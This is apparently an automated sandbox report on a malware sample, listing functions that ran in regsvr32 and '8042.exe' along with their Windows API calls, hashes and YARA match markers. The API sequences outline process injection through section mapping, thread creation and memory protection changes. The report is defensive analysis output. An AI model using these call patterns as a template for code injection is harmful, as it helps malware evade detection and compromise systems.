Source File: 0000000D.00000002.2284130054.0000000004541000.00000020.00001000.00020000.00000000.sdmp, Offset: 04541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4541000_regsvr32.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: ed41fe6c25a2668066167d2f8b7ba8a4426e2b5e4c42f4f3c32f7f63fee24310
Instruction ID: e5c2238ec21e63a576b10b3eb1ac2a7efae863c9930a6f7e1284d18dcf7ca4ce
Opcode Fuzzy Hash: ed41fe6c25a2668066167d2f8b7ba8a4426e2b5e4c42f4f3c32f7f63fee24310
Instruction Fuzzy Hash: BEF1FF726043419FE718CF29C881BABB7E7FFC5314F158A2DE899DB394DA70A8058B51

Uniqueness

Uniqueness Score: -1.00%

Function 04671000 Relevance: 1.7, APIs: 1, Instructions: 238
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MapViewOfFile.KERNELBASE(?,?,?,?,?), ref: 046711E5

Memory Dump Source

Source File: 0000000D.00000002.2284339975.0000000004671000.00000020.00001000.00020000.00000000.sdmp, Offset: 04671000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4671000_regsvr32.jbxd

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: ce85f2c1ee315183c2602fefb7cdc9c52a01ca5d28db8dcc3f8ec874cadbf48e
Instruction ID: b76c2e0ea738b4ce8c70ade471aeee198877121d7dd49c414234d9b9a05904b8
Opcode Fuzzy Hash: ce85f2c1ee315183c2602fefb7cdc9c52a01ca5d28db8dcc3f8ec874cadbf48e
Instruction Fuzzy Hash: 20A13C76E002298FCB18CFA9C9506EDFBB2EF89310F55819AD459AB345DA306D46CF80

Uniqueness

Uniqueness Score: -1.00%

Function 046787F0 Relevance: 1.7, APIs: 1, Instructions: 206
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileMappingW.KERNELBASE(?,?,?,?,?,?), ref: 04678954

Memory Dump Source

Source File: 0000000D.00000002.2284339975.0000000004671000.00000020.00001000.00020000.00000000.sdmp, Offset: 04671000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4671000_regsvr32.jbxd

Similarity

API ID: CreateFileMapping
String ID:
API String ID: 524692379-0
Opcode ID: 690264064af04e28386577f15ebd3eb9cdd364e9623808badbe8dbf685e96a11
Instruction ID: f2fd79d939701255be4b90be59b425e64a439ee9668c775454d2a34ce536b535
Opcode Fuzzy Hash: 690264064af04e28386577f15ebd3eb9cdd364e9623808badbe8dbf685e96a11
Instruction Fuzzy Hash: 7A81AF36A186418FC710CF29C88459AFBE2FFD8314F298A19E4A59B355E734F946CB81

Uniqueness

Uniqueness Score: -1.00%

Function 04678AB0 Relevance: 1.7, APIs: 1, Instructions: 195
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 04678BAB

Memory Dump Source

Source File: 0000000D.00000002.2284339975.0000000004671000.00000020.00001000.00020000.00000000.sdmp, Offset: 04671000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4671000_regsvr32.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 86028c749ed86101be531270bcbe2d106d22544b48502e19da41189c69a67ae6
Instruction ID: 65f8f5237eee2f7f48d47ea1d28bac52b55715faae0a69437dfcde9c6143bda6
Opcode Fuzzy Hash: 86028c749ed86101be531270bcbe2d106d22544b48502e19da41189c69a67ae6
Instruction Fuzzy Hash: 06719372A083218FD714CF29C88055BF7E2BBC8724F568A2DE995A7394D674BD06CBC1

Uniqueness

Uniqueness Score: -1.00%

Function 0467657B Relevance: 1.5, APIs: 1, Instructions: 29
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateThreadEx.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 046765DB

Memory Dump Source

Source File: 0000000D.00000002.2284339975.0000000004671000.00000020.00001000.00020000.00000000.sdmp, Offset: 04671000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4671000_regsvr32.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: f845cbaae60e4a3744f828fd9082b0137c1406c5cf61097ca8fe0d3d4aefe9ee
Instruction ID: f491997b1f54c8dd2f1d0cb22cab97326741606afe2d7a664dc93a7254e44c0e
Opcode Fuzzy Hash: f845cbaae60e4a3744f828fd9082b0137c1406c5cf61097ca8fe0d3d4aefe9ee
Instruction Fuzzy Hash: 3B014672549781DFC7728F94C940F9ABBE2BF88300F05885DE28997235D7329524EF52

Uniqueness

Uniqueness Score: -1.00%

Function 04676790 Relevance: 1.4, APIs: 1, Instructions: 196
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(?,?,?,?), ref: 04676898

Memory Dump Source

Source File: 0000000D.00000002.2284339975.0000000004671000.00000020.00001000.00020000.00000000.sdmp, Offset: 04671000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4671000_regsvr32.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1eeb6176026a655798aa498a5bdc81294eb8414731be26444f099dc9af7c2902
Instruction ID: 6d6e920024c940ce3d8fb3f2cbfa12e734a95a9223f882a937029befe6173f70
Opcode Fuzzy Hash: 1eeb6176026a655798aa498a5bdc81294eb8414731be26444f099dc9af7c2902
Instruction Fuzzy Hash: 11719036618B42CFD314CF29C88096AB7E3FBC4314F158A1DE4958B358EB74E956CB92

Uniqueness

Uniqueness Score: -1.00%

Function 046785F3 Relevance: 1.4, APIs: 1, Instructions: 153
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualFree.KERNELBASE(?,?,?,?), ref: 0467861D

Memory Dump Source

Source File: 0000000D.00000002.2284339975.0000000004671000.00000020.00001000.00020000.00000000.sdmp, Offset: 04671000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4671000_regsvr32.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: c6f475e69ba8b4c87e330cb89fbcfbd12f1da1669d62f28934408a395fcc7ae6
Instruction ID: 72c8ec723d0736fee69d8b0651fd5bb872ce61be3928474ee586619a4f56c302
Opcode Fuzzy Hash: c6f475e69ba8b4c87e330cb89fbcfbd12f1da1669d62f28934408a395fcc7ae6
Instruction Fuzzy Hash: 4D61C976E00228CFDB54CFA9C84469DF7B2BB98324F2A8199D519B7355D730AD86CF80

Uniqueness

Uniqueness Score: -1.00%

Function 00721390 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 160
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 007213E7
VirtualProtect.KERNELBASE ref: 00721468

Strings

`, xrefs: 007215AE

Memory Dump Source

Source File: 0000000D.00000002.2283554320.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_720000_regsvr32.jbxd

Similarity

API ID: ProtectVirtual
String ID: `
API String ID: 544645111-2679148245
Opcode ID: bdabb54f37c00923127f41d6e3f4738e3907803814bffc50362f021fd13d368a
Instruction ID: 7ef478728456216aa56aa3501ca340b1b374a9cb329a202ee13148b294c509b5
Opcode Fuzzy Hash: bdabb54f37c00923127f41d6e3f4738e3907803814bffc50362f021fd13d368a
Instruction Fuzzy Hash: 3B819DB4D042188FDB18CF99C894A9DFBB1FF48310F2581AED909AB356D735A985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00721495 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 94
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 00721672

Strings

`, xrefs: 007215AE

Memory Dump Source

Source File: 0000000D.00000002.2283554320.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_720000_regsvr32.jbxd

Similarity

API ID: ProtectVirtual
String ID: `
API String ID: 544645111-2679148245
Opcode ID: 46c2cecab08ca37e31b7085c2bdad64d90d43972f62dcac5ba3002939338b3fb
Instruction ID: 60e590a506122693b4c7983c5187b35d7f1da8d3acc3ab7e2385c88af0677d74
Opcode Fuzzy Hash: 46c2cecab08ca37e31b7085c2bdad64d90d43972f62dcac5ba3002939338b3fb
Instruction Fuzzy Hash: 42419BB5E002288FDB54CF58C880B99FBB1FF49300F5581AAC909AB356D735AE81CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00721F88 Relevance: 1.3, APIs: 1, Instructions: 85
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 00722000

Memory Dump Source

Source File: 0000000D.00000002.2283554320.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_720000_regsvr32.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 3aa63de0692e28bde594d0e51837f8d5a77f8e9de094f2df4f72df46bb5d8c3c
Instruction ID: c262f847b6d18373080237c3fae8a35d951e6ee52262132609c2ef7a69254d75
Opcode Fuzzy Hash: 3aa63de0692e28bde594d0e51837f8d5a77f8e9de094f2df4f72df46bb5d8c3c
Instruction Fuzzy Hash: 414102B09012058FDB04DFA8C1587AEBBF0FF48308F24846ED858AB341D37AA946CF91

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 8042.exePID: 848, Parent PID: 2580COMMON

Executed Functions

Function 00401459 Relevance: 10.7, APIs: 7, Instructions: 205
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040151A
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401547
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040156A
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401588
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004015C9
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015FA
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 0040161C

Memory Dump Source

Source File: 00000011.00000002.2422808484.0000000000400000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_8042.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 18bb0942cf7732f1e7e9348b9e4638d715bd5e379a532981f4cfd6fc1bab53ed
Instruction ID: 824bdb3f01dfe795a3c7e8dad3f72d12e996fe891ee9aa3045e2d2799232a241
Opcode Fuzzy Hash: 18bb0942cf7732f1e7e9348b9e4638d715bd5e379a532981f4cfd6fc1bab53ed
Instruction Fuzzy Hash: 03615075900244FBEB209F91CC88FAF7BBCEF85710F20412AF912BA1E5D6749902DB25

Uniqueness

Uniqueness Score: -1.00%

Function 00401464 Relevance: 10.7, APIs: 7, Instructions: 176
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040151A
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401547
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040156A
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401588
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004015C9
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015FA
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 0040161C

Memory Dump Source

Source File: 00000011.00000002.2422808484.0000000000400000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_8042.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: d0ba545f9b84970c14c6a6978537046fb31c33432f947fbcb194d4807a9179fe
Instruction ID: 1b7a740d0a2c2f6fa3111a7952f10ef420ed90631ee8fafdee6261f7546e4b5c
Opcode Fuzzy Hash: d0ba545f9b84970c14c6a6978537046fb31c33432f947fbcb194d4807a9179fe
Instruction Fuzzy Hash: 5C512EB5900245BFEB208F91CC89FAFBBB8FF85700F144169F911BA1E5D6749945CB24

Uniqueness

Uniqueness Score: -1.00%

Function 00401476 Relevance: 10.7, APIs: 7, Instructions: 172
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040151A
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401547
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040156A
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401588
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004015C9
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015FA
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 0040161C

Memory Dump Source

Source File: 00000011.00000002.2422808484.0000000000400000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_8042.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 902bc5ca559ed9e4d662cc33b28e540e89b424f1126a925eadd581121bc5f95c
Instruction ID: 24926f0ed9362c88baa72b1d3950bb37aab3afc39f97412acee1af3b4ee373b4
Opcode Fuzzy Hash: 902bc5ca559ed9e4d662cc33b28e540e89b424f1126a925eadd581121bc5f95c
Instruction Fuzzy Hash: 62511B74900205BFEB208F91CC88FAFBBB8FF85B10F104169F911BA2A5D6759945CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00401487 Relevance: 10.7, APIs: 7, Instructions: 172
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040151A
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401547
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040156A
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401588
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004015C9
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015FA
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 0040161C

Memory Dump Source

Source File: 00000011.00000002.2422808484.0000000000400000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_8042.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 06e9cfe1479e5a03c6ec80d911c79d2a753d86d3742f35c4fab1e93e8a9487c6
Instruction ID: 531b993744403f3b0e459290f0a2e4e38646215b0f3fea317dafb4ce5b717631
Opcode Fuzzy Hash: 06e9cfe1479e5a03c6ec80d911c79d2a753d86d3742f35c4fab1e93e8a9487c6
Instruction Fuzzy Hash: 7B51FA74900245BFEB208F91CC89FAFBBB8FF85B10F104169F911BA2E5D6759945CB24

Uniqueness

Uniqueness Score: -1.00%

Function 02C4003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02C4024D

Strings

cess, xrefs: 02C4018D
kernel32.dll, xrefs: 02C4008F, 02C40095

Memory Dump Source

Source File: 00000011.00000002.2424970399.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2c40000_8042.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 9c6c39d744e66da998234f7eafb144f198e58fe89f23fef007059eb5dcb8abaf
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 7D527974A01229DFDB64CF68C984BADBBB1BF09304F1480D9E94DAB351DB30AA85DF15

Uniqueness

Uniqueness Score: -1.00%

Function 02C77420 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02C77448
Module32First.KERNEL32(00000000,00000224), ref: 02C77468

Memory Dump Source

Source File: 00000011.00000002.2425309073.0000000002C70000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2c70000_8042.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 0efcb481ff9e2961206237e48895d90e26b182af9ff1e13c9ec9d0c68394cfea
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: B6F0F6319003186FD7203BF8988CF6EBAE8AF89328F100538E642D14C0CB70E9094E61

Uniqueness

Uniqueness Score: -1.00%

Function 02C40E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02C40223,?,?), ref: 02C40E19
SetErrorMode.KERNELBASE(00000000,?,?,02C40223,?,?), ref: 02C40E1E

Memory Dump Source

Source File: 00000011.00000002.2424970399.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2c40000_8042.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 994b33df5fd358b2e7e35cf1cce9ee3a15b093092ac9ac22606117ff364d12c4
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 9AD0123114512877D7002A94DC09BCE7B1CDF05B66F008011FB0DD9080CB70964046E5

Uniqueness

Uniqueness Score: -1.00%

Function 00401836 Relevance: 1.3, APIs: 1, Instructions: 63
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388,000000F2), ref: 0040188E

Part of subcall function 00401459: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040151A
Part of subcall function 00401459: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401547

Memory Dump Source

Source File: 00000011.00000002.2422808484.0000000000400000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_8042.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 5fe9852cb3b16d13d41dc0a5a5dd34054b66a166a86d7432244ea44f75af5684
Instruction ID: 26a1fdf4500ec8cbc3ac7de6d99b3c29e4db1c45972af98faf71547af7c19dd8
Opcode Fuzzy Hash: 5fe9852cb3b16d13d41dc0a5a5dd34054b66a166a86d7432244ea44f75af5684
Instruction Fuzzy Hash: 4D115A33608204EBE7007A958D81A6A3359AB01744F30C53BBA03791F1E57D9B17776B

Uniqueness

Uniqueness Score: -1.00%

Function 00401841 Relevance: 1.3, APIs: 1, Instructions: 60
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388,000000F2), ref: 0040188E

Part of subcall function 00401459: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040151A
Part of subcall function 00401459: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401547

Memory Dump Source

Source File: 00000011.00000002.2422808484.0000000000400000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_8042.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 8ee1de9066595ad0e61d64b713a9fac7be815ebb721b5af3ac785391454956b3
Instruction ID: 60792c4a7526ea552847b3a91dff35a52e5e302759975406a596f99de029ab3f
Opcode Fuzzy Hash: 8ee1de9066595ad0e61d64b713a9fac7be815ebb721b5af3ac785391454956b3
Instruction Fuzzy Hash: 61013933608204EBE7007A959D41ABA3355AB01700F30C53BBA13BA1E2D67D9B16775B

Uniqueness

Uniqueness Score: -1.00%

Function 00401853 Relevance: 1.3, APIs: 1, Instructions: 58
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388,000000F2), ref: 0040188E

Part of subcall function 00401459: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040151A
Part of subcall function 00401459: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401547

Memory Dump Source

Source File: 00000011.00000002.2422808484.0000000000400000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_8042.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 54946a7250cb5feca53fdd6599a6a1ac6599185f95ef7f8e449090f0b593b209
Instruction ID: 03e687555a80bda43a0fb2ee47453ef0aaeecb99a45078ea764f23224eae553e
Opcode Fuzzy Hash: 54946a7250cb5feca53fdd6599a6a1ac6599185f95ef7f8e449090f0b593b209
Instruction Fuzzy Hash: 4D015B33608244EBE700BA958D81A6A3355AB45340F30C537BA53791F2D57D9B13776B

Uniqueness

Uniqueness Score: -1.00%

Function 00401857 Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388,000000F2), ref: 0040188E

Part of subcall function 00401459: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040151A
Part of subcall function 00401459: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401547

Memory Dump Source

Source File: 00000011.00000002.2422808484.0000000000400000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_8042.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 60d69e591f8ae860f05d4a1728b49aadf6fc8823851b109aae25b7397b01a375
Instruction ID: 9a71c24e7624d4cba15f7dc810b31ffa0f6b825e5129f2c2b066e818f6866dfb
Opcode Fuzzy Hash: 60d69e591f8ae860f05d4a1728b49aadf6fc8823851b109aae25b7397b01a375
Instruction Fuzzy Hash: 84015A33608204EBEB007AA58981A7A3355AB05344F30C537BA13791F2D67DDB13776B

Uniqueness

Uniqueness Score: -1.00%

Function 0040185B Relevance: 1.3, APIs: 1, Instructions: 50
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388,000000F2), ref: 0040188E

Part of subcall function 00401459: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040151A
Part of subcall function 00401459: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401547

Memory Dump Source

Source File: 00000011.00000002.2422808484.0000000000400000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_8042.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 4388562ce27fc4a15a78ad1b772eee4a6aa3e4e486251ae2e078266ee9ffae5a
Instruction ID: 819a87e902f8c0d7a2d51235ddf7de8326c9ac12c4bfa64292614a1114275343
Opcode Fuzzy Hash: 4388562ce27fc4a15a78ad1b772eee4a6aa3e4e486251ae2e078266ee9ffae5a
Instruction Fuzzy Hash: F6015A33608244EBDB017AA59C81A6A3765AB05344F20C537BA53790F2C67DDB13B76B

Uniqueness

Uniqueness Score: -1.00%

Function 0040187C Relevance: 1.3, APIs: 1, Instructions: 50
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388,000000F2), ref: 0040188E

Memory Dump Source

Source File: 00000011.00000002.2422808484.0000000000400000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_8042.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 22e121ca1fce9ea374c1d2197991afafad4e058241d826c977f5527675b6c88e
Instruction ID: 25ca90d843f9a0050b2ac0440a8a7fc97a2c355cc6a88e856e0782c626425077
Opcode Fuzzy Hash: 22e121ca1fce9ea374c1d2197991afafad4e058241d826c977f5527675b6c88e
Instruction Fuzzy Hash: CC018433608245EBDB01BBA18C81D6A3765BB05344F20C577BA12BA0F3D63D9B12B75B

Uniqueness

Uniqueness Score: -1.00%

Function 00401865 Relevance: 1.3, APIs: 1, Instructions: 49
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388,000000F2), ref: 0040188E

Part of subcall function 00401459: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040151A
Part of subcall function 00401459: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401547

Memory Dump Source

Source File: 00000011.00000002.2422808484.0000000000400000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_8042.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 1f4d1c7c02ee77c938f54659cb8056c4a616808132e58342662b8049ff76b57c
Instruction ID: 4d6adbc00aad04e5ca27aa77f6ef62765a3aff560696b363dc11b175c0b3fa60
Opcode Fuzzy Hash: 1f4d1c7c02ee77c938f54659cb8056c4a616808132e58342662b8049ff76b57c
Instruction Fuzzy Hash: 1A017C33608204EADB007A958C81A6A3355AB04340F20C437BA13790F2C67DDB12B76B

Uniqueness

Uniqueness Score: -1.00%

Function 02C770DF Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02C77130

Memory Dump Source

Source File: 00000011.00000002.2425309073.0000000002C70000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2c70000_8042.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 5376c622e6b886592a3abb33a19d2c529b7c946b27a998d090a85c8a95acc68f
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 58113979A00208EFDB01DF98C985E99BBF5EF08350F0580A4F9489B361D771EA94EF80

Uniqueness

Uniqueness Score: -1.00%

Function 0040186D Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON

